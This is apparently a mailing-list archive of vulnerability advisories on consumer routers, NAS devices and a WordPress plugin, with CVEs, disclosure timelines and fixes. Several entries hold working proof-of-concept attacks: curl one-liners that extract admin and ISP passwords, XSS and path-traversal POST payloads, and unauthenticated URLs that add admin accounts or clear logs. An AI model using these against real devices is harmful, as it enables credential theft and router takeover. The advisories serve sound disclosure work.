ASUSTOR NAS ADM - 3.1.0 Remote Command Execution, SQL Injections

2018-08-14 Thread kyle Lovett
 initialization, which
enables them to  compromise end user data or gain root access on the
appliance.
-------

[Researchers]
Kyle Lovett - (twitter - @SquirrelBuddha)
Matthew Fulton (twitter - @haqur)
https://www.purehacking.com/blog/matthew-fulton/
https://github.com/mefulton/CVE-2018-11510/


Wordpress Plugin Social-Stream - Exposure of Twitter API Secret Key and Token

2017-05-26 Thread kyle Lovett
Wordpress Plugin Social-Stream - Exposure of Twitter API Secret Keys
CWE-522: Insufficiently Protected Credentials

Products:
Wordpress Social Stream
Versions 1.6.0 and lower
https://codecanyon.net/item/wordpress-social-stream/2201708

Social Network Tabs
Versions 1.7.4 and lower
https://codecanyon.net/item/social-network-tabs-for-wordpress/1982987

Fix:
Wordpress Social Stream, V 1.6.1
https://codecanyon.net/item/wordpress-social-stream/2201708

"WordPress Social Stream will combine all of your social network feeds into one
single network stream or create a single feed for multiple social
network profiles."

A weakness exists in the Wordpress plugin Social-Stream which exposes all four
Twitter API keys as parameters of a URL link on the webpage in which the plugin
widget is rendered.

consumer_key
consumer_secret
oauth_access_token
oauth_access_token_secret

When the end user places the code in their HTML to embed a Twitter Stream feed,
it calls the file dcwp_twitter.php, where the Twitter API keys are stored.
Those keys are set as a variable, then are incorrectly echoed onto the webpage.

===
$auth = new dcwss_TwitterOAuth($consumer_key,$consumer_secret,$oauth_access_token,$oauth_access_token_secret);
$get = $auth->get( $rest, $params );
//print_r($get->errors);
} else {
echo $get;
}
===

The full, clear-text URL is exposed, similar to this:

http://example.com/wp-content/plugins/wordpress-social-stream/inc/dcwp_twitter.php?1=consumer_key&2=consumer_secret&3=access_key&4=access_secret

Google Dork
https://www.google.com/search?num=100=dcwp_twitter+text=0

Fix:
The vendor has issued a patch for the Wordpress Social Stream, V 1.6.1
available here:
https://codecanyon.net/item/wordpress-social-stream/2201708

It is not known whether a patch has been issued for Social Network Tabs plugin.

An important note: the keys will remain good even after the patch,
until the end user revokes the original keys and issues a new set.
Changing one's password will not mitigate this problem; however,
setting the app to be read-only in Twitter will mitigate an attacker's
ability to post tweets or change profile pictures as them.
--
Timeline:
Vendor notified on 04/01/2017
Fix Complete on 04/06/2017
Disclosure Public 05/21/2017
Contact: Kyle Lovett krlov...@gmail.com
--
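As an added example (not the plugin's or the vendor's code), the pattern the advisory's fix amounts to: the four credentials stay server-side and the page only ever links to a proxy endpoint that returns rendered fields. The class name dcwss_TwitterOAuth is taken from the snippet above; the option name 'my_twitter_creds', the action name 'my_twitter_feed' and the handler name are assumptions.

```php
<?php
// Added illustration, not the Social-Stream plugin's code. Assumes the plugin's
// dcwss_TwitterOAuth class (from the advisory snippet) with get($rest, $params)
// returning decoded JSON; 'my_twitter_creds' and 'my_twitter_feed' are assumed names.
//
// Weak shape described in the advisory: the widget embeds a link such as
//   dcwp_twitter.php?1=<consumer_key>&2=<consumer_secret>&3=<token>&4=<token_secret>
// so anyone viewing the page source holds the keys, and the handler echoes the
// raw API response (errors included) to the browser. The hardened shape below
// never lets the credentials leave the server.

function my_twitter_feed_proxy() {
    // Only the feed selector comes from the client, and it is validated strictly.
    $screen_name = isset($_GET['screen_name'])
        ? sanitize_text_field(wp_unslash($_GET['screen_name']))
        : '';
    if (!preg_match('/^[A-Za-z0-9_]{1,15}$/', $screen_name)) {
        wp_send_json_error('invalid screen_name', 400);
    }

    // Credentials live in wp_options, set once by the site administrator.
    $creds = get_option('my_twitter_creds', array());
    foreach (array('consumer_key', 'consumer_secret',
                   'oauth_access_token', 'oauth_access_token_secret') as $k) {
        if (empty($creds[$k])) {
            // Do not say which key is missing; that detail stays admin-side.
            wp_send_json_error('feed not configured', 500);
        }
    }

    $auth = new dcwss_TwitterOAuth($creds['consumer_key'], $creds['consumer_secret'],
                                   $creds['oauth_access_token'],
                                   $creds['oauth_access_token_secret']);
    $get = $auth->get('statuses/user_timeline',
                      array('screen_name' => $screen_name, 'count' => 10));

    // Never echo the raw API body: a Twitter error object can name the app and
    // token. A timeline decodes to an array; anything else is treated as failure.
    if (!is_array($get)) {
        error_log('my_twitter_feed: upstream fetch failed'); // details stay in the server log
        wp_send_json_error('feed unavailable', 502);
    }

    // Pass through only the fields the widget renders.
    $tweets = array();
    foreach ($get as $t) {
        if (isset($t->id_str, $t->text, $t->created_at)) {
            $tweets[] = array('id' => $t->id_str, 'text' => $t->text,
                              'created_at' => $t->created_at);
        }
    }
    wp_send_json_success($tweets);
}

// The page's embed calls admin-ajax.php?action=my_twitter_feed&screen_name=...
// for anonymous and logged-in visitors alike; no credential appears in that URL.
add_action('wp_ajax_my_twitter_feed', 'my_twitter_feed_proxy');
add_action('wp_ajax_nopriv_my_twitter_feed', 'my_twitter_feed_proxy');

// Note: this stops further leakage only. Keys already exposed by the old embed
// stay valid until they are revoked and reissued in the Twitter app settings.
```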


Easy Hosting Control Panel (EHCP) - Multiple Vulnerabilities

2016-03-30 Thread kyle Lovett
/setup.sh
http:///ehcp/smtpd.cert
http:///ehcp/smtpd.key
http:///ehcp/ssh2.sh
http:///ehcp/stats.php
http:///ehcp/misc/importexport.php
http:///ehcp/misc/mysqltroubleshooter.php
http:///ehcp/misc/redirect_index.html
http:///ehcp/misc/serverstatus.sh


Access : Remote
Complexity : Low
CWE-256: Plaintext Storage of a Password
CWE-200: Information Exposure
CWE-592: Authentication Bypass Issues



Timeline: In late February the Vendor was contacted via email, which
was followed up with a full bug report at https://launchpad.net/ehcp.
While the vendor did reply to acknowledge the bugs, no timeframe nor
any other information was given for when a fix would be complete.
Vendor did not respond to any further followup correspondence.

There is no known workaround at this time other than disabling the
EHCP suite completely and switching to a more secure solution until
these issues can be patched.

While the GUI interface mechanisms do an OK job of locking down the
masked URL front-end web calls they make, the backend files which are
being called can all be directly accessed, bypassing the need to use
the GUI interface.

Research Contact: Kyle Lovett
March 29, 2016


Full Disclosure - DIR-652/DIR-835/DIR-855L/DGL-5500/DHP-1565 - Clear Text Password/XSS/Information Disclosure

2014-05-22 Thread kyle Lovett
The following five D-Link model routers suffer from several
vulnerabilities including Clear Text Storage of Passwords, Cross Site
Scripting and Sensitive Information Disclosure.

DIR-652
D-Link Wireless N Gigabit Home Router

DIR-835
D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router

DIR-855L
D-Link Wireless N900 Dual Band Gigabit Router

DGL-5500
D-Link AC1300 Gaming Router

DHP-1565
D-Link Wireless N PowerLine Gigabit Router

Affected firmware - FW 1.02b18/1.12b02 or older

Access - Remote
Complexity - Low
Authentication - None
Impact - Full loss of confidentiality

-
Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information

Authentication can be bypassed to gain access to the file
tools_admin.asp, which stores the device's admin password in plain
text, by adding a / to the end of the URL.

Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:

curl -s http://IP/tools_admin.asp/ | awk '/hidden/ && /admin_password_tmp/ && /value/ {print $5}'

PoC for the DHP-1565 and DIR-652; the generic 'user' must be added:

curl -s http://IP/tools_admin.asp/ -u user: | awk '/hidden/ && /admin_password_tmp/ && /value/ {print $5}'

-
Cross Site Scripting - CWE - CWE-79: Improper Neutralization of User
Input / Return

For the file apply.cgi (apply_sec.cgi on the DGL-5500) the POST
param action suffers from an XSS vulnerability due to improper
neutralization of user input / return output.

PoC for DIR-855L, DIR-835, DHP-1565

http://IP/apply.cgi

POST
graph_code=Xsession_id=123456login_n=userlogin_name=8action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3Elog_pass=html_response_page=login_pic.asptmp_log_pass=gcode_base64=MTg0MzU%3D
HTTP/1.1

For the DGL-5500

http://IP/apply_sec.cgi

POST
graph_code=Xsession_id=123456login_n=userlogin_name=8action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3Elog_pass=html_response_page=login_pic.asptmp_log_pass=gcode_base64=MTg0MzU%3D
HTTP/1.1

-
Sensitive Information Disclosure - CWE - CWE-200: Information Exposure

The D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a
vulnerability through which an unauthenticated person can gain access
to the sensitive files:

http://IP:8080/hnap.cgi and /HNAP1/ via:

curl -s http://IP:8080/HNAP1/

On the DIR-652  and DHP-1565, a user needs authentication first to
gain access to these files.

But more importantly, an unauthenticated user can browse directly to
http://IP/cgi/ssi/ which will offer a download of the device's ELF
MBS MIPS file. The file contains most of the device's internal working
structure and sensitive information. These particular routers use an
MSB EM_MIPS processor and it does contain executable components.

The file can be accessed through at least one known cgi file, however
there may be others. Although no known publicly working example exists
to my knowledge, unpatched devices are susceptible to injection of
malicious code and most likely susceptible to a payload which could
deploy a self-replicating worm.
-

These items were reported to D-Link on April 20th, and to US Cert on
April 21. D-Link does have patches available for all affected models,
and it is highly recommended to update the device's firmware as soon
as possible.

Vendor Links:
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025
http://securityadvisories.dlink.com/security/

Research Contact - Kyle Lovett
May 21, 2014


D-Link DAP-1320 Wireless Range Extender Directory Traversal and XSS Vulnerabilities

2014-04-17 Thread kyle Lovett
D-Link's DAP-1320 Wireless Range Extender suffers from both a
directory traversal and an XSS vulnerability on all firmware versions
(current v. 1.20B07).

-
Directory Traversal
CWE-22: Path Traversal

The POST param 'html_response_page' of apply.cgi suffers from a
directory traversal vulnerability.

The following example will display the contents of /etc/passwd:

http://IP/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded

POST 
html_response_page=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswdlogin_name=html_response_message=just_loginlog_pass=login_n=adminaction=do_graph_authtmp_log_pass=PANtmp_log_pass_auth=FRIEDgraph_code=0DEYsession_id=57687gcode_base64=8TEHPOO%3D
HTTP/1.1

-
XSS
CWE-79: Cross Site Scripting

The POST param 'html_response_page' of apply.cgi suffers from an XSS
vulnerability.

Example:

http://IP/apply.cgi
Pragma: no-cache
Cache-control: no-cache
Content-Type: application/x-www-form-urlencoded

POST
html_response_page=%3Cscript%3Ealert%28SquirrelLord%29%3B%3C%2Fscript%3Elogin_name=Huggyhtml_response_message=just_loginlog_pass=login_n=adminaction=do_graph_authtmp_log_pass=poptmp_log_pass_auth=goesgraph_code=joffreysession_id=57687gcode_base64=ZZTOPI%3D
 HTTP/1.1

-

Vendor Link:
http://support.dlink.com/ProductInfo.aspx?m=DAP-1320

Research Contact: K Lovett


Full Disclosure - Linksys EA2700, EA3500, E4200 and EA4500 - Authentication Bypass to Administrative Console

2014-02-17 Thread kyle Lovett
Vulnerable products : Linksys EA2700, EA3500, E4200, EA4500

Vulnerability:
Due to an unknown bug, which occurs by every indication during the
installation and/or upgrade process, port 8083 will often open,
allowing for direct bypass of authentication to the classic Linksys
GUI administrative console for remote unauthenticated users.

If vulnerable, an attacker would have complete control of the router's
administrative features and functions.

On affected models by simply browsing to:

http://IP:8083/

a user will be placed into the admin console, with no prompt for
authentication. Moreover, by browsing to:

http://IP:8083/cgi-bin/

the following four cgi scripts (often there are more depending on the
firmware and model) can also be found.

fw_sys_up.cgi
override.cgi
share_editor.cgi
switch_boot.cgi

It has been observed that Port 443 will show as open to external scans
when the vulnerability exists, though not all routers with this open
port are affected. On the http header for port 8083, for those
affected, Basic Setup is the only item of note observed.

An end user should not rely on the router's GUI interface for the
status of remote access, as this bug is present when the console shows
remote access as disabled.

CVE ID: 2013-5122
CWE-288: Authentication Bypass Using an Alternate Path or Channel
CVSS Base Score 10
CVSS Temporal Score 8.1
Exploitability Subscore: 10.0

Timeline:
The vendor was first notified of this bug in July 2013, and several
follow-up conversations have occurred since that time.

Patches/Workaround:
No known patches or official fixes exist, though some workaround
fixes, including reinstallation of the firmware, have often been shown
to solve the issue. This is not an official workaround and it is
strongly advised to contact Linksys support for additional
information.

Recommendations:

- Scan for an open port 8083 from the WAN side of the router to check
for this particular vulnerability.
- Since an attacker has access to enable the FTP service, USB drives
mounted on those routers which have them should be removed until an
official fix is out or vulnerability of the router has been ruled out.

Research Contacts: Kyle Lovett and Matt Claunch
Discovered - July 2013
Updated - February 2014


ASUS RT Series Routers FTP Service - Default anonymous access

2014-02-13 Thread kyle Lovett
Five ASUS RT series routers suffer from a vendor vulnerability that
defaults the FTP service to anonymous access with full read/write
permissions. The service, which is activated from the administrative
console, does not give proper instructions or indications that the end
user needs to manually add a user to the FTP access table.

The vendor was first alerted to this issue in late June of 2012, and
then four other times officially from July 2012 to December 2012. It
was not until January of this year, when the editors for the Norwegian
publication IDG/PC World went to ASUS that any official response came.

This vulnerability has been exploited aggressively for some time now,
and as a rolling count which has been kept ongoing since July 2012,
over 30,000 unique IP addresses, at one time or another, have had their
FTP service shared.

The FTP service, when not secured, allows for full read/write access
to any external storage devices attached to the USB ports on the
router.

The vendor has issued an official (beta) patch for the RT-AC68U as of
mid-January, and plans on additional patches in the coming week.

Models Include:

RT-AC68U
RT-AC56U
RT-AC66U
RT-N66U
RT-N16

CWE-287: Improper Authentication
CVSS v2 Vector (AV:N/AC:L/Au:N/C:C/I:C/A:N/E:H/RL:OF/RC:C)

CVSS Base Score 9.4
Impact Subscore 9.2
Exploitability Subscore 10
CVSS Temporal Score 8.2
Overall CVSS Score 8.2

Many have reported malware being uploaded into the sync share folders,
large amounts of unauthorized file sharing and most importantly the
theft of entire hard drives of personal information. Over 7,300 units
are still vulnerable to this weakness as of today.

It is strongly urged that those with any of the above routers check to
ensure that their FTP service has been secured.

Links:
https://www.asus.com/Networking/RTAC68U/#support
http://www.idg.no/pcworld/article281004.ece
http://www.thinkbroadband.com/news/6229-new-asus-router-firmware-to-fix-ftp-security-issue.html
http://www.pcworld.com/article/2087180/asus-simplifies-router-configuration-to-protect-external-hard-drives.html

Research Contact - Kyle Lovett
Discovered - June, 2012


Re: ASUS RT Series Routers FTP Service - Default anonymous access

2014-02-13 Thread kyle Lovett
Correction: I meant to say 2013, not 2012. I apologize for the error.

On Wed, Feb 12, 2014 at 4:29 PM, kyle Lovett krlov...@gmail.com wrote:


ASUS AiCloud Enabled Routers 12 Models - Authentication bypass and Sensitive file/path disclosure

2014-02-10 Thread kyle Lovett
ASUS routers, which are enabled with the AiCloud service (SSL ports),
are vulnerable to bypass of authentication and sensitive file
disclosure. This vulnerability has been observed in all firmware
versions, though the latest version increases the complexity of the
attack. By sending a specially crafted packet, an attacker can exploit a
weakness in the software by calling a non-existent file /smb.xml. This
attack leads to sensitive path disclosure and directory traversal.

The latest 3.0.0.4.374.2xxx firmware versions, specifically on the
66 and 68 series routers, have shown a weakness that may allow an
attacker to exploit the /smb.xml vulnerability with a specially
crafted packet to cause a short-term denial of service to the AiCloud
service.

The full details were disclosed to the Vendor last month. There are no
known patches or workarounds at this time other than turning off any
remote access to the AiCloud service.

This is not directly related to the clear text password disclosure
made last July. Also, it is strongly advised that the password to the
administrative side of the router be changed from the default, since
hijacking the router's VPN service becomes trivial once access to the
admin console is obtained.

RT-AC68U Dual-band Wireless-AC1900 Gigabit Router
RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router
RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router
RT-N66R Dual-Band Wireless-N900 Gigabit Router
RT-N66U Dual-Band Wireless-N900 Gigabit Router
RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router
RT-N56R Dual-Band Wireless-AC1200 Gigabit Router
RT-N56U Dual-Band Wireless-AC1200 Gigabit Router
RT-N14U Wireless-N300 Cloud Router
RT-N14UHP Wireless-N300 Cloud Router
RT-N16 Wireless-N300 Gigabit Router
RT-N16R Wireless-N300 Gigabit Router

Access Vector: Remote
Access Complexity: High
Authentication: None
Confidentiality Impact: Partial
Availability Impact: Partial

CWE-400: Uncontrolled Resource Consumption
CWE-208: Information Exposure Through Timing Discrepancy
CWE-211: Information Exposure Through Externally-Generated Error Message
CWE-289: Authentication Bypass by Alternate Name

Product Pages:

http://www.asus.com/Networking/
http://www.asus.com/support/

Research Contact - K Lovett
Discovered - January, 2014


Full Disclosure - Multiple vulnerabilities in five Zoom ADSL Modem/Routers

2013-09-02 Thread kyle Lovett
Five models of the Zoom Telephonics ADSL Modem/Router line suffer from
multiple critical vulnerabilities, almost all being of a remote access
attack vector.

Models affected:
Zoom X3 ADSL Modem/Router
Zoom X4 ADSL Modem/Router
Zoom X5 ADSL Modem/Router
Zoom ADSL Bridge Modem Model 5715 (1 vulnerability)
Zoom USB ADSL Modem Model 5510B (1 vulnerability)


Timeline:
The vendor has not responded to our inquiries concerning these
vulnerabilities. They were first reported on June 28th, 2013 and
partial disclosure was made on July 9, 2013.




Directory Traversal/Unauthenticated access to administrative panels

CVSS Base Score 9.7
Impact Subscore 9.5
Temporal Score: 8.3
(AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-22: Improper Limitation of a Pathname to a Restricted Directory

CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X


By simply placing the following two URLs into a web browser, a
vulnerability in all models and firmware versions allows for bypass
of the administrative credential challenge. On all models and firmware
versions these pages can be accessed with no authentication. An
unauthenticated user can perform almost all administrative tasks once
the authentication is bypassed.

http://IP/hag/pages/toc.htm (--Menu Banner)
http://IP/hag/pages/toolbox.htm (-Advanced Options Menu)





Improper handling of unexpected characters/data

CVSS Base Score 8.3
Impact Subscore 8.5
Temporal Score: 6.7
(AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR)
CWE-241: Improper Handling of Unexpected Data Type

CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X
CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions
CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions

When an unexpected/illegal character is added to the end of any URL
which calls a value, such as http://IP/MainPage?id=25', the browser
will immediately be redirected to the System Status page
without authentication, where links to each interface (i.e.
eth-0, usb-0, etc.) are selectable and their properties can be edited.




Plain text storage of ISP/PPPoe usernames/passwords

CVSS Base Score 6.8
Impact Subscore 6.4
Temporal Score: 8.6
(AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR)
CWE-311: Missing Encryption of Sensitive Data

CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X

The following command will display the ISP usernames and passwords.
(The print value may vary slightly based on firmware.)

Proof of Concept
curl -s http://IP/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }'
   value=wanpasswd1 ('or similar')

curl -s http://IP/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }'
   value=u...@usersisp.net ('or similar')




Unauthenticated direct execution of administrative tasks

CVSS Base Score 10.0
Impact Subscore 10.0
Temporal Score: 8.6
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-285: Improper Authorization

CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X
CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X
CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X

Administrative authentication can be bypassed and commands directly
executed with specially crafted commands.

Proofs of Concept -

Create New Acct Admin or Intermediate - (all PW and admin names are
'or similar')

http://IP/hag/emweb/PopOutUserAdd.htm?id=70user_id=newintermediateaccountpriv=v2pass1=123456pass2=123456cmdSubmit=Save+Changes


Clear Logs

http://IP/Action?id=76cmdClear+Log=Clear+Log



Fixes/Patches:
There are no known patches or fixes for these vulnerabilities at this time.


Workaround:
It is advised to turn off all remote administrative access to the
router. This 

Update: Linksys EA2700, EA3500, E4200v2, EA4500 Unspecified unauthenticated remote access

2013-08-16 Thread kyle Lovett
-
Vulnerabilities:
An unspecified bug can cause an unsafe/undocumented TCP port to open
allowing for:

- Unauthenticated remote access to all pages of the router
administration GUI, bypassing any credential prompts under certain
common configurations

- Direct access to several critical system files

CVE-ID 2013-5122
CWE-288: Authentication Bypass Using an Alternate Path or Channel
CVSS Base Score 10
CVSS Temporal Score 8.1
Exploitability Subscore: 10.0

Affected models and firmware:
Linksys SMART Wi-Fi Router N600 - EA2700 Firmware Version: 1.0.14
Linksys SMART Wi-Fi Router N750 Smooth Stream EA3500 Firmware Version: 1.0.30
Linksys Maximum Performance N Router E4200v2 Firmware Version: 2.0.36
Linksys Maximum Performance N Router E4200v2 Firmware Version: 2.0.37
Linksys SMART Wi-Fi N900 Media Stream EA4500 Firmware Version: 2.0.36
Linksys SMART Wi-Fi N900 Media Stream EA4500 Firmware Version: 2.0.37
-Web Server Lighttpd 1.4.28
-Running - Linux 2.6.22

-

Vulnerability Conditions seen in all variations, though not limited to:
- Classic GUI has been enabled/installed
- Remote Management - Disabled
- UPnP - Enabled
- IPv4 SPI Firewall Protection - Disabled

Fixes and workarounds:

*** It is strongly advised to those that have the classic GUI firmware
installed to do a full WAN side scan for unusual ports that are open
that weren't specifically opened by the end user.

It is recommended to upgrade to firmware 2.1.39 on the E4200v2 and
EA4500, though it is uncertain if this resolves the problem in all
cases.
It is recommended to upgrade to firmware 1.1.39 on the EA2700 and
EA3500, though it is uncertain if this resolves the problem in all
cases.

Vendor: We have been working with Linksys/Belkin Engineers on this
problem, and they are still investigating the root cause. We hope to
have additional information on this bug soon.

-

External Links Misc:
http://www.osvdb.org/show/osvdb/94768
http://www.securityfocus.com/archive/1/527027
http://securityvulns.com/news/Linksys/EA/1307.html
http://www.scip.ch/en/?vuldb.9326
http://www.mobzine.ro/ionut-balan/2013/07/vulnerabilitate-majora-in-linksys-ea2700-ea3500-e4200-ea4500/

Vendor product links:
http://support.linksys.com/en-us/support/routers/EA2700
http://support.linksys.com/en-us/support/routers/EA3500
http://support.linksys.com/en-us/support/routers/E4200
http://support.linksys.com/en-us/support/routers/EA4500

Discovered - 07-01-2013
Updated - 08-15-2013
Research Contact - K Lovett, M Claunch
Affiliation - SUSnet


Full Disclosure - WD My Net N600, N750, N900, N900C - Plain Text Disclosure of Admin Credentials

2013-07-22 Thread kyle Lovett
Vulnerable Products -
WD My Net N600 HD Dual Band Router Wireless N WiFi Router Accelerate HD
WD My Net N750 HD Dual Band Router Wireless N WiFi Router Accelerate HD
Linux 2.6.3 Kernel
Firmware Ver. 1.03.xx 1.04.xx
Firmware unaffected Ver 1.01.xx

WD My Net N900 HD Dual Band Router Wireless N WiFi Router Accelerate HD
WD My Net N900 Central HD Dual Band Router 2TB Storage WiFi Wireless Router
Firmware Ver. 1.05.xx 1.06.xx
Version 1.07.16 released on 05/2013 does not have this bug
Firmware unaffected Ver. 1.01.xx 1.02.xx 1.03.xx

--

Vulnerabilities -
On the WD My Net N600, N750, N900 and N900C routers, administrative
credentials are stored in plain text and are easily accessible from a
remote location via port 8080 on the WAN side of the router.

On those routers affected by the bug, the following command will
display the password value that openly resides in their php source
code:

curl -s http://IP:8080/main_internet.php? -L | egrep -i 'var pass'

During initial setup, the page main_internet.php will store in plain
text the admin password as the value of var pass. Port 8080 is shared
by both the UPnP modules and the WAN side HTTP web services to which
remote administrative access is set by default. The inherent difficulty
of writing code to fit the unique requirements of authentication-based
tasks (administrative) on the same port as services that are
privileged (UPnP) is quite apparent in the complexity with which each
service is called on these units. Indeed, several of the developers'
comments inside the code, as well as warnings to the end user on the
admin GUIs, are made concerning this conflict and the risks involved.

For example, in one commented-out line concerning an API function, they state:
/* 80, 443 ports can not
use*//api/1.0/rest/device?owner=adminpw=name= + hostname +
rest_method=PUT;

Again, under code to start certain features that call UPnP services,
it warns the end user:
Conflict with Remote Management service HTTP port+:
+XG(XMLrm+/web)+. +This may cause unpredictable problem. Are you
sure you want to override?

In fact, when a call is made to change the password for the admin
user, or to authenticate a remote administrative user's access, a php
or cgi action will call one of several module services built into
UPnP, in this case DEVICE.ACCOUNT.

Ex: - Changing the password for admin will issue the following series
of commands:

/tools_admin.php -- /getcfg.php
(SERVICES=DEVICE.ACCOUNT%2CHTTP.WAN-1%2CALERTMSG) -- hedwig.cgi (which
posts the privileged postxml module for
serviceDEVICE.ACCOUNT/service) -- /pigwidgeon.cgi
(ACTIONS=SETCFG%2CSAVE%2CACTIVATE) -- /getcfg.php (sets the new cookie
value, and finalizes the action)

Conditions -
UPnP and remote administrative access must be enabled for the bug to
be activated.

---

Vendor Timeline-
Western Digital has not returned any inquiries that have been made
regarding the bug.

Patches or Fixes-
On WD My Net N900 and N900C
It is advised that users upgrade to Firmware Version 1.07.16.

On WD My Net N600 and N750
If a restoration to Ver. 1.01.xx firmware is available, and remote
access via the internet is a required feature, it is advised to
contact vendor support for how best to proceed.

Mitigation and Workarounds for those who aren't able to upgrade or
downgrade firmware -
Turn off all remote administrative access to the router
Disable UPnP services
Change the default username and password



Note:
Critical vulnerabilities discovered on UPnP-enabled routers and other
devices that have visibility and access to the WAN have continued to
rise at a very rapid pace over the past year. During Defcon 19, Daniel
Garcia gave a talk about UPnP port mapping, the risks involved with
the unpredictable nature of UPnP stacks and the danger that NAT
traversal could be a possible outcome.
http://toor.do/DEFCON-19-Garcia-UPnP-Mapping-WP.pdf

Back in January of this year, the security researcher at Rapid7,
HD Moore, had written a white paper on UPnP vulnerabilities, warning
that around 40-50 million network-enabled devices are at risk, which
he explains includes devices such as routers, printers,
network-attached storage (NAS), media players and smart TVs.
https://community.rapid7.com/docs/DOC-2150 In each of the devices he
mentions, we have seen some exploitable vulnerabilities begin to
surface, and even in some devices not mentioned yet such as DVRs and
IP Web Cameras.

A few vendors have been able to sufficiently mitigate the risks of
UPnP/DLNA services co-existing with their products supporting remote
access capabilities, however, many have not. The growing list of home
router or modem models that are still vulnerable to a known 

Western Digital My Net N600, N750, N900 and N900C - Plain text disclosure of administrative credentials

2013-07-19 Thread kyle Lovett
Vulnerable Products -
WD My Net N600 HD Dual Band Router Wireless N WiFi Router Accelerate HD
WD My Net N750 HD Dual Band Router Wireless N WiFi Router Accelerate HD
Linux 2.6.3 Kernel
All firmware including the latest Ver. 1.04.16

WD My Net N900 HD Dual Band Router Wireless N WiFi Router Accelerate HD
WD My Net N900 Central HD Dual Band Router 2TB Storage WiFi Wireless Router
Firmware 1.06 and below -
Version 1.07.16 released on 05/2013 fixes the bug for the N900 and N900C

Vulnerabilities -
Due to an unspecified bug in the WD My Net N600, N750, N900 and N900C
routers, administrative credentials are stored in plain text and are
easily accessible from a remote location on the WAN side of the
router.

Note: In addition, hidden elements of the administrative GUI can be
revealed on all the routers with a few trivial actions. It is not
known at this time if changes to the admin console can be successfully
made through the revealed elements.

Conditions -
UPnP and remote administrative access must be enabled for the bug to
be activated.

Vendor Timeline-
Western Digital has not returned any inquiries that have been made
regarding the bug.

Patches or Fixes-
On WD My Net N900 and N900C
It is advised that users upgrade to Firmware Version 1.07.16, which
fixes the bug on these two routers.

On WD My Net N600 and N750
There are no known patches or fixes available at this time.

Mitigation and Workarounds-
On N900 and N900C
Upgrade to Firmware Version 1.07.16

WD My Net N600 and N750
Turn off all remote administrative access to the router
Disable UPnP services
Change the default username and password

Discovered - 07-02-2013
Research Contact - K Lovett
Affiliation - SUSnet


Full Disclosure ASUS Wireless Routers Ten Models - Multiple Vulnerabilities on AiCloud enabled units

2013-07-14 Thread kyle Lovett
Note: In June I released a partial disclosure for just the RT-N66U on
the issue of directory traversal. I have only heard back from ASUS
twice on the issue, and I understand they are working on a fix.
However, no serious attempt to our knowledge has been made to warn
their customers in the meantime, even after multiple requests from
several different security professionals.

Nor has ASUS posted a disclosure of these serious issues to new
potential customers on their AiCloud web adverts, since they still
advertise the product as an add-on with these routers, as a safe and
bug free home cloud solution.

Linux 2.6.xx kernel
All firmware versions known
---
Vulnerable Asus Models

